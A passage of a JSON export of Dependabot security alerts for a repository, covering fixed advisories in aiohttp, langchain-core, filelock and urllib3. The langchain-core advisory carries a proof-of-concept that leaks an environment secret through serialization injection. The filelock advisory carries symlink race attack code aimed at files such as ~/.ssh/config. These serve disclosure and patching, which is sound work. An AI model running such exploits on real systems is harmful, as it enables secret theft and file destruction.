3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/9","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/9","created_at":"2026-04-30T08:37:31Z","updated_at":"2026-05-13T05:27:05Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:05Z","auto_dismissed_at":null},{"number":8,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-mqqc-3gqh-h2x8","cve_id":"CVE-2025-69225","summary":"AIOHTTP has unicode match groups in regexes for ASCII protocol elements","description":"### Summary\n\nThe parser allows non-ASCII decimals to be present in the Range header.\n\n### Impact\n\nThere is no known impact, but there is the possibility that there's a method to exploit a request smuggling vulnerability.\n\n----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/c7b7a044f88c71cefda95ec75cdcfaa4792b3b96","severity":"low","identifiers":[{"value":"GHSA-mqqc-3gqh-h2x8","type":"GHSA"},{"value":"CVE-2025-69225","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-mqqc-3gqh-h2x8"},{"url":"https://github.com/aio-libs/aiohttp/commit/c7b7a044f88c71cefda95ec75cdcfaa4792b3b96"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69225"},{"url":"https://github.com/advisories/GHSA-mqqc-3gqh-h2x8"}],"published_at":"2026-01-05T23:09:30Z","updated_at":"2026-01-06T16:06:45Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00056,"percentile":0.17169},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-444","name":"Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/8","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/8","created_at":"2026-04-30T08:37:31Z","updated_at":"2026-05-13T05:27:05Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:05Z","auto_dismissed_at":null},{"number":7,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-69f9-5gxw-wvc2","cve_id":"CVE-2025-69224","summary":"AIOHTTP's unicode processing of header values could cause parsing discrepancies","description":"### Summary\nThe Python HTTP parser may allow a request smuggling attack with the presence of non-ASCII characters.\n\n### Impact\nIf a pure Python version of aiohttp is installed (i.e. without the usual C extensions) or AIOHTTP_NO_EXTENSIONS is enabled, then an attacker may be able to execute a request smuggling attack to bypass certain firewalls or proxy protections.\n\n------\n\nPatch: https://github.com/aio-libs/aiohttp/commit/32677f2adfd907420c078dda6b79225c6f4ebce0","severity":"low","identifiers":[{"value":"GHSA-69f9-5gxw-wvc2","type":"GHSA"},{"value":"CVE-2025-69224","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-69f9-5gxw-wvc2"},{"url":"https://github.com/aio-libs/aiohttp/commit/32677f2adfd907420c078dda6b79225c6f4ebce0"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69224"},{"url":"https://github.com/advisories/GHSA-69f9-5gxw-wvc2"}],"published_at":"2026-01-05T22:58:57Z","updated_at":"2026-01-06T16:06:41Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00053,"percentile":0.16392},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-444","name":"Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/7","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/7","created_at":"2026-04-30T08:37:31Z","updated_at":"2026-05-13T05:27:05Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:05Z","auto_dismissed_at":null},{"number":6,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-6mq8-rvhq-8wgg","cve_id":"CVE-2025-69223","summary":"AIOHTTP's HTTP Parser auto_decompress feature is vulnerable to zip bomb","description":"### Summary\nA zip bomb can be used to execute a DoS against the aiohttp server.\n\n### Impact\nAn attacker may be able to send a compressed request that when decompressed by aiohttp could exhaust the host's memory.\n\n------\n\nPatch: https://github.com/aio-libs/aiohttp/commit/2b920c39002cee0ec5b402581779bbaaf7c9138a","severity":"high","identifiers":[{"value":"GHSA-6mq8-rvhq-8wgg","type":"GHSA"},{"value":"CVE-2025-69223","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6mq8-rvhq-8wgg"},{"url":"https://github.com/aio-libs/aiohttp/commit/2b920c39002cee0ec5b402581779bbaaf7c9138a"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69223"},{"url":"https://github.com/advisories/GHSA-6mq8-rvhq-8wgg"}],"published_at":"2026-01-05T22:58:41Z","updated_at":"2026-01-06T16:06:18Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"high","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00082,"percentile":0.23714},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-409","name":"Improper Handling of Highly Compressed Data (Data Amplification)"},{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"high","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/6","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/6","created_at":"2026-04-30T08:37:31Z","updated_at":"2026-05-13T05:27:05Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:05Z","auto_dismissed_at":null},{"number":5,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"langchain-core"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-c67j-w6g6-q2cm","cve_id":"CVE-2025-68664","summary":"LangChain serialization injection vulnerability enables secret extraction in dumps/loads APIs","description":"## Summary\n\nA serialization injection vulnerability exists in LangChain's `dumps()` and `dumpd()` functions. The functions do not escape dictionaries with `'lc'` keys when serializing free-form dictionaries. The `'lc'` key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data.\n\n### Attack surface\n\nThe core vulnerability was in `dumps()` and `dumpd()`: these functions failed to escape user-controlled dictionaries containing `'lc'` keys. When this unescaped data was later deserialized via `load()` or `loads()`, the injected structures were treated as legitimate LangChain objects rather than plain user data.\n\nThis escaping bug enabled several attack vectors:\n\n1. **Injection via user data**: Malicious LangChain object structures could be injected through user-controlled fields like `metadata`, `additional_kwargs`, or `response_metadata`\n2. **Class instantiation within trusted namespaces**: Injected manifests could instantiate any `Serializable` subclass, but only within the pre-approved trusted namespaces (`langchain_core`, `langchain`, `langchain_community`). This includes classes with side effects in `__init__` (network calls, file operations, etc.). Note that namespace validation was already enforced before this patch, so arbitrary classes outside these trusted namespaces could not be instantiated.\n\n### Security hardening\n\nThis patch fixes the escaping bug in `dumps()` and `dumpd()` and introduces new restrictive defaults in `load()` and `loads()`: allowlist enforcement via `allowed_objects=\"core\"` (restricted to [serialization mappings](https://github.com/langchain-ai/langchain/blob/master/libs/core/langchain_core/load/mapping.py)), `secrets_from_env` changed from `True` to `False`, and default Jinja2 template blocking via `init_validator`. These are breaking changes for some use cases.\n\n## Who is affected?\n\nApplications are vulnerable if they:\n\n1. **Use `astream_events(version=\"v1\")`** — The v1 implementation internally uses vulnerable serialization. Note: `astream_events(version=\"v2\")` is not vulnerable.\n2. **Use `Runnable.astream_log()`** — This method internally uses vulnerable serialization for streaming outputs.\n3. **Call `dumps()` or `dumpd()` on untrusted data, then deserialize with `load()` or `loads()`** — Trusting your own serialization output makes you vulnerable if user-controlled data (e.g., from LLM responses, metadata fields, or user inputs) contains `'lc'` key structures.\n4. **Deserialize untrusted data with `load()` or `loads()`** — Directly deserializing untrusted data that may contain injected `'lc'` structures.\n5. **Use `RunnableWithMessageHistory`** — Internal serialization in message history handling.\n6. **Use `InMemoryVectorStore.load()`** to deserialize untrusted documents.\n7. Load untrusted generations from cache using **`langchain-community` caches**.\n8. Load untrusted manifests from the LangChain Hub via **`hub.pull`**.\n9. Use **`StringRunEvaluatorChain`** on untrusted runs.\n10. Use **`create_lc_store`** or **`create_kv_docstore`** with untrusted documents.\n11. Use **`MultiVectorRetriever`** with byte stores containing untrusted documents.\n12. Use **`LangSmithRunChatLoader`** with runs containing untrusted messages.\n\nThe most common attack vector is through **LLM response fields** like `additional_kwargs` or `response_metadata`, which can be controlled via prompt injection and then serialized/deserialized in streaming operations.\n\n## Impact\n\nAttackers who control serialized data can extract environment variable secrets by injecting `{\"lc\": 1, \"type\": \"secret\", \"id\": [\"ENV_VAR\"]}` to load environment variables during deserialization (when `secrets_from_env=True`, which was the old default). They can also instantiate classes with controlled parameters by injecting constructor structures to instantiate any class within trusted namespaces with attacker-controlled parameters, potentially triggering side effects such as network calls or file operations.\n\nKey severity factors:\n\n- Affects the serialization path - applications trusting their own serialization output are vulnerable\n- Enables secret extraction when combined with `secrets_from_env=True` (the old default)\n- LLM responses in `additional_kwargs` can be controlled via prompt injection\n\n## Exploit example\n\n```python\nfrom langchain_core.load import dumps, load\nimport os\n\n# Attacker injects secret structure into user-controlled data\nattacker_dict = {\n \"user_data\": {\n \"lc\": 1,\n \"type\": \"secret\",\n \"id\": [\"OPENAI_API_KEY\"]\n }\n}\n\nserialized = dumps(attacker_dict) # Bug: does NOT escape the 'lc' key\n\nos.environ[\"OPENAI_API_KEY\"] = \"sk-secret-key-12345\"\ndeserialized = load(serialized, secrets_from_env=True)\n\nprint(deserialized[\"user_data\"]) # \"sk-secret-key-12345\" - SECRET LEAKED!\n\n```\n\n## Security hardening changes (breaking changes)\n\nThis patch introduces three breaking changes to `load()` and `loads()`:\n\n1. **New `allowed_objects` parameter** (defaults to `'core'`): Enforces allowlist of classes that can be deserialized. The `'all'` option corresponds to the list of objects [specified in `mappings.py`](https://github.com/langchain-ai/langchain/blob/master/libs/core/langchain_core/load/mapping.py) while the `'core'` option limits to objects within `langchain_core`. We recommend that users explicitly specify which objects they want to allow for serialization/deserialization.\n2. **`secrets_from_env` default changed from `True` to `False`**: Disables automatic secret loading from environment\n3. **New `init_validator` parameter** (defaults to `default_init_validator`): Blocks Jinja2 templates by default\n\n## Migration guide\n\n### No changes needed for most users\n\nIf you're deserializing standard LangChain types (messages, documents, prompts, trusted partner integrations like `ChatOpenAI`, `ChatAnthropic`, etc.), your code will work without changes:\n\n```python\nfrom langchain_core.load import load\n\n# Uses default allowlist from serialization mappings\nobj = load(serialized_data)\n\n```\n\n### For custom classes\n\nIf you're deserializing custom classes not in the serialization mappings, add them to the allowlist:\n\n```python\nfrom langchain_core.load import load\nfrom my_package import MyCustomClass\n\n# Specify the classes you need\nobj = load(serialized_data, allowed_objects=[MyCustomClass])\n```\n\n### For Jinja2 templates\n\nJinja2 templates are now blocked by default because they can execute arbitrary code. If you need Jinja2 templates, pass `init_validator=None`:\n\n```python\nfrom langchain_core.load import load\nfrom langchain_core.prompts import PromptTemplate\n\nobj = load(\n serialized_data,\n allowed_objects=[PromptTemplate],\n init_validator=None\n)\n\n```\n\n> [!WARNING]\n> Only disable `init_validator` if you trust the serialized data. Jinja2 templates can execute arbitrary Python code.\n\n### For secrets from environment\n\n`secrets_from_env` now defaults to `False`. If you need to load secrets from environment variables:\n\n```python\nfrom langchain_core.load import load\n\nobj = load(serialized_data, secrets_from_env=True)\n```\n\n\n## Credits\n\n* Dumps bug was reported by @yardenporat\n* Changes for security hardening due to findings from @0xn3va and @VladimirEliTokarev","severity":"critical","identifiers":[{"value":"GHSA-c67j-w6g6-q2cm","type":"GHSA"},{"value":"CVE-2025-68664","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-c67j-w6g6-q2cm"},{"url":"https://github.com/langchain-ai/langchain/pull/34455"},{"url":"https://github.com/langchain-ai/langchain/pull/34458"},{"url":"https://github.com/langchain-ai/langchain/commit/5ec0fa69de31bbe3d76e4cf9cd65a6accb8466c8"},{"url":"https://github.com/langchain-ai/langchain/commit/d9ec4c5cc78960abd37da79b0250f5642e6f0ce6"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D0.3.81"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D1.2.5"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68664"},{"url":"https://github.com/advisories/GHSA-c67j-w6g6-q2cm"}],"published_at":"2025-12-23T18:46:13Z","updated_at":"2025-12-24T01:08:11Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"critical","vulnerable_version_range":">= 1.0.0, < 1.2.5","first_patched_version":{"identifier":"1.2.5"}},{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"critical","vulnerable_version_range":"< 0.3.81","first_patched_version":{"identifier":"0.3.81"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N","score":9.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.02264,"percentile":0.84694},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N","score":9.3},"cwes":[{"cwe_id":"CWE-502","name":"Deserialization of Untrusted Data"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"critical","vulnerable_version_range":">= 1.0.0, < 1.2.5","first_patched_version":{"identifier":"1.2.5"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/5","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/5","created_at":"2026-04-30T08:37:30Z","updated_at":"2026-05-13T05:27:05Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:05Z","auto_dismissed_at":null},{"number":4,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"filelock"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-w853-jp5j-5j7f","cve_id":"CVE-2025-68146","summary":"filelock has a TOCTOU race condition which allows symlink attacks during lock file creation","description":"### Impact\n\nA Time-of-Check-Time-of-Use (TOCTOU) race condition allows local attackers to corrupt or truncate arbitrary user files through symlink attacks. The vulnerability exists in both Unix and Windows lock file creation where filelock checks if a file exists before opening it with O_TRUNC. An attacker can create a symlink pointing to a victim file in the time gap between the check and open, causing os.open() to follow the symlink and truncate the target file.\n\n**Who is impacted:**\n\nAll users of filelock on Unix, Linux, macOS, and Windows systems. The vulnerability cascades to dependent libraries:\n\n- **virtualenv users**: Configuration files can be overwritten with virtualenv metadata, leaking sensitive paths\n- **PyTorch users**: CPU ISA cache or model checkpoints can be corrupted, causing crashes or ML pipeline failures\n- **poetry/tox users**: through using virtualenv or filelock on their own.\n\nAttack requires local filesystem access and ability to create symlinks (standard user permissions on Unix; Developer Mode on Windows 10+). Exploitation succeeds within 1-3 attempts when lock file paths are predictable.\n\n### Patches\n\nFixed in version **3.20.1**.\n\n**Unix/Linux/macOS fix:** Added O_NOFOLLOW flag to os.open() in UnixFileLock.\\_acquire() to prevent symlink following.\n\n**Windows fix:** Added GetFileAttributesW API check to detect reparse points (symlinks/junctions) before opening files in WindowsFileLock.\\_acquire().\n\n**Users should upgrade to filelock 3.20.1 or later immediately.**\n\n### Workarounds\n\nIf immediate upgrade is not possible:\n\n1. Use SoftFileLock instead of UnixFileLock/WindowsFileLock (note: different locking semantics, may not be suitable for all use cases)\n2. Ensure lock file directories have restrictive permissions (chmod 0700) to prevent untrusted users from creating symlinks\n3. Monitor lock file directories for suspicious symlinks before running trusted applications\n\n**Warning:** These workarounds provide only partial mitigation. The race condition remains exploitable. Upgrading to version 3.20.1 is strongly recommended.\n\n______________________________________________________________________\n\n## Technical Details: How the Exploit Works\n\n### The Vulnerable Code Pattern\n\n**Unix/Linux/macOS** (`src/filelock/_unix.py:39-44`):\n\n```python\ndef _acquire(self) -> None:\n ensure_directory_exists(self.lock_file)\n open_flags = os.O_RDWR | os.O_TRUNC # (1) Prepare to truncate\n if not Path(self.lock_file).exists(): # (2) CHECK: Does file exist?\n open_flags |= os.O_CREAT\n fd = os.open(self.lock_file, open_flags, ...) # (3) USE: Open and truncate\n```\n\n**Windows** (`src/filelock/_windows.py:19-28`):\n\n```python\ndef _acquire(self) -> None:\n raise_on_not_writable_file(self.lock_file) # (1) Check writability\n ensure_directory_exists(self.lock_file)\n flags = os.O_RDWR | os.O_CREAT | os.O_TRUNC # (2) Prepare to truncate\n fd = os.open(self.lock_file, flags, ...) # (3) Open and truncate\n```\n\n### The Race Window\n\nThe vulnerability exists in the gap between operations:\n\n**Unix variant:**\n\n```\nTime Victim Thread Attacker Thread\n---- ------------- ---------------\nT0 Check: lock_file exists? → False\nT1 ↓ RACE WINDOW\nT2 Create symlink: lock → victim_file\nT3 Open lock_file with O_TRUNC\n → Follows symlink\n → Opens victim_file\n → Truncates victim_file to 0 bytes! ☠️\n```\n\n**Windows variant:**\n\n```\nTime Victim Thread Attacker Thread\n---- ------------- ---------------\nT0 Check: lock_file writable?\nT1 ↓ RACE WINDOW\nT2 Create symlink: lock → victim_file\nT3 Open lock_file with O_TRUNC\n → Follows symlink/junction\n → Opens victim_file\n → Truncates victim_file to 0 bytes! ☠️\n```\n\n### Step-by-Step Attack Flow\n\n**1. Attacker Setup:**\n\n```python\n# Attacker identifies target application using filelock\nlock_path = \"/tmp/myapp.lock\" # Predictable lock path\nvictim_file = \"/home/victim/.ssh/config\" # High-value target\n```\n\n**2. Attacker Creates Race Condition:**\n\n```python\nimport os\nimport threading\n\n\ndef attacker_thread():\n # Remove any existing lock file\n try:\n os.unlink(lock_path)\n except FileNotFoundError:\n pass\n\n # Create symlink pointing to victim file\n os.symlink(victim_file, lock_path)\n print(f\"[Attacker] Created: {lock_path} → {victim_file}\")\n\n\n# Launch attack\nthreading.Thread(target=attacker_thread).start()\n```\n\n**3. Victim Application Runs:**\n\n```python\nfrom filelock import UnixFileLock\n\n# Normal application code\nlock = UnixFileLock(\"/tmp/myapp.lock\")\nlock.acquire() # ← VULNERABILITY TRIGGERED HERE\n# At this point, /home/victim/.ssh/config is now 0 bytes!\n```\n\n**4. What Happens Inside os.open():**\n\nOn Unix systems, when `os.open()` is called:\n\n```c\n// Linux kernel behavior (simplified)\nint open(const char *pathname, int flags) {\n struct file *f = path_lookup(pathname); // Resolves symlinks by default!\n\n if (flags & O_TRUNC) {\n truncate_file(f); // ← Truncates the TARGET of the symlink\n }\n\n return file_descriptor;\n}\n```\n\nWithout `O_NOFOLLOW` flag, the kernel follows the symlink and truncates the target file.\n\n### Why the Attack Succeeds Reliably\n\n**Timing Characteristics:**\n\n- **Check operation** (Path.exists()): ~100-500 nanoseconds\n- **Symlink creation** (os.symlink()): ~1-10 microseconds\n- **Race window**: ~1-5 microseconds (very small but exploitable)\n- **Thread scheduling quantum**: ~1-10 milliseconds\n\n**Success factors:**\n\n1. **Tight loop**: Running attack in a loop hits the race window within 1-3 attempts\n2. **CPU scheduling**: Modern OS thread schedulers frequently context-switch during I/O operations\n3. **No synchronization**: No atomic file creation prevents the race\n4. **Symlink speed**: Creating symlinks is extremely fast (metadata-only operation)\n\n### Real-World Attack Scenarios\n\n**Scenario 1: virtualenv Exploitation**\n\n```python\n# Victim runs: python -m venv /tmp/myenv\n# Attacker racing to create:\nos.symlink(\"/home/victim/.bashrc\", \"/tmp/myenv/pyvenv.cfg\")\n\n# Result: /home/victim/.bashrc overwritten with:\n# home = /usr/bin/python3\n# include-system-site-packages = false\n# version = 3.11.2\n# ← Original .bashrc contents LOST + virtualenv metadata LEAKED to attacker\n```\n\n**Scenario 2: PyTorch Cache Poisoning**\n\n```python\n# Victim runs: import torch\n# PyTorch checks CPU capabilities, uses filelock on cache\n# Attacker racing to create:\nos.symlink(\"/home/victim/.torch/compiled_model.pt\", \"/home/victim/.cache/torch/cpu_isa_check.lock\")\n\n# Result: Trained ML model checkpoint truncated to 0 bytes\n# Impact: Weeks of training lost, ML pipeline DoS\n```\n\n### Why Standard Defenses Don't Help\n\n**File permissions don't prevent this:**\n\n- Attacker doesn't need write access to victim_file\n- os.open() with O_TRUNC follows symlinks using the *victim's* permissions\n- The victim process truncates its own file\n\n**Directory permissions help but aren't always feasible:**\n\n- Lock files often created in shared /tmp directory (mode 1777)\n- Applications may not control lock file location\n- Many apps use predictable paths in user-writable directories\n\n**File locking doesn't prevent this:**\n\n- The truncation happens *during* the open() call, before any lock is acquired\n- fcntl.flock() only prevents concurrent lock acquisition, not symlink attacks\n\n### Exploitation Proof-of-Concept Results\n\nFrom empirical testing with the provided PoCs:\n\n**Simple Direct Attack** (`filelock_simple_poc.py`):\n\n- Success rate: 33% per attempt (1 in 3 tries)\n- Average attempts to success: 2.1\n- Target file reduced to 0 bytes in \\<100ms\n\n**virtualenv Attack** (`weaponized_virtualenv.py`):\n\n- Success rate: ~90% on first attempt (deterministic timing)\n- Information leaked: File paths, Python version, system configuration\n- Data corruption: Complete loss of original file contents\n\n**PyTorch Attack** (`weaponized_pytorch.py`):\n\n- Success rate: 25-40% per attempt\n- Impact: Application crashes, model loading failures\n- Recovery: Requires cache rebuild or model retraining\n\n**Discovered and reported by:** George Tsigourakos (@tsigouris007)","severity":"medium","identifiers":[{"value":"GHSA-w853-jp5j-5j7f","type":"GHSA"},{"value":"CVE-2025-68146","type":"CVE"}],"references":[{"url":"https://github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f"},{"url":"https://github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e"},{"url":"https://github.com/tox-dev/filelock/releases/tag/3.20.1"},{"url":"https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants"},{"url":"https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html"},{"url":"https://github.com/advisories/GHSA-w853-jp5j-5j7f"}],"published_at":"2025-12-16T20:52:55Z","updated_at":"2025-12-16T20:52:56Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"filelock"},"severity":"medium","vulnerable_version_range":"< 3.20.1","first_patched_version":{"identifier":"3.20.1"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H","score":6.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":4.0e-05,"percentile":0.00136},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H","score":6.3},"cwes":[{"cwe_id":"CWE-59","name":"Improper Link Resolution Before File Access ('Link Following')"},{"cwe_id":"CWE-362","name":"Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')"},{"cwe_id":"CWE-367","name":"Time-of-check Time-of-use (TOCTOU) Race Condition"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"filelock"},"severity":"medium","vulnerable_version_range":"< 3.20.1","first_patched_version":{"identifier":"3.20.1"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/4","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/4","created_at":"2026-04-30T08:37:30Z","updated_at":"2026-05-13T05:27:05Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:05Z","auto_dismissed_at":null},{"number":3,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"urllib3"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-2xpw-w6gg-jr37","cve_id":"CVE-2025-66471","summary":"urllib3 streaming API improperly handles highly compressed data","description":"### Impact\n\nurllib3's [streaming API](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once.\n\nWhen streaming a compressed response, urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). The library must read compressed data from the network and decompress it until the requested chunk size is met. Any resulting decompressed data that exceeds the requested amount is held in an internal buffer for the next read operation.\n\nThe decompression logic could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This can result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data; CWE-409) on the client side, even if the application only requested a small chunk of data.\n\n\n### Affected usages\n\nApplications and libraries using urllib3 version 2.5.0 and earlier to stream large compressed responses or content from untrusted sources.\n\n`stream()`, `read(amt=256)`, `read1(amt=256)`, `read_chunked(amt=256)`, `readinto(b)` are examples of `urllib3.HTTPResponse` method calls using the affected logic unless decoding is disabled explicitly.\n\n\n### Remediation\n\nUpgrade to at least urllib3 v2.6.0 in which the library avoids decompressing data that exceeds the requested amount.\n\nIf your environment contains a package facilitating the Brotli encoding, upgrade to at least Brotli 1.2.0 or brotlicffi 1.2.0.0 too. These versions are enforced by the `urllib3[brotli]` extra in the patched versions of urllib3.\n\n\n### Credits\n\nThe issue was reported by @Cycloctane.\nSupplemental information was provided by @stamparm during a security audit performed by [7ASecurity](https://7asecurity.com/) and facilitated by [OSTIF](https://ostif.org/).","severity":"high","identifiers":[{"value":"GHSA-2xpw-w6gg-jr37","type":"GHSA"},{"value":"CVE-2025-66471","type":"CVE"}],"references":[{"url":"https://github.com/urllib3/urllib3/security/advisories/GHSA-2xpw-w6gg-jr37"},{"url":"https://github.com/urllib3/urllib3/commit/c19571de34c47de3a766541b041637ba5f716ed7"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66471"},{"url":"https://github.com/advisories/GHSA-2xpw-w6gg-jr37"}],"published_at":"2025-12-05T18:15:54Z","updated_at":"2025-12-05T18:33:09Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.0, < 2.6.0","first_patched_version":{"identifier":"2.6.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H","score":8.9}},"epss":{"percentage":0.00014,"percentile":0.02784},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-409","name":"Improper Handling of Highly Compressed Data (Data Amplification)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.0, < 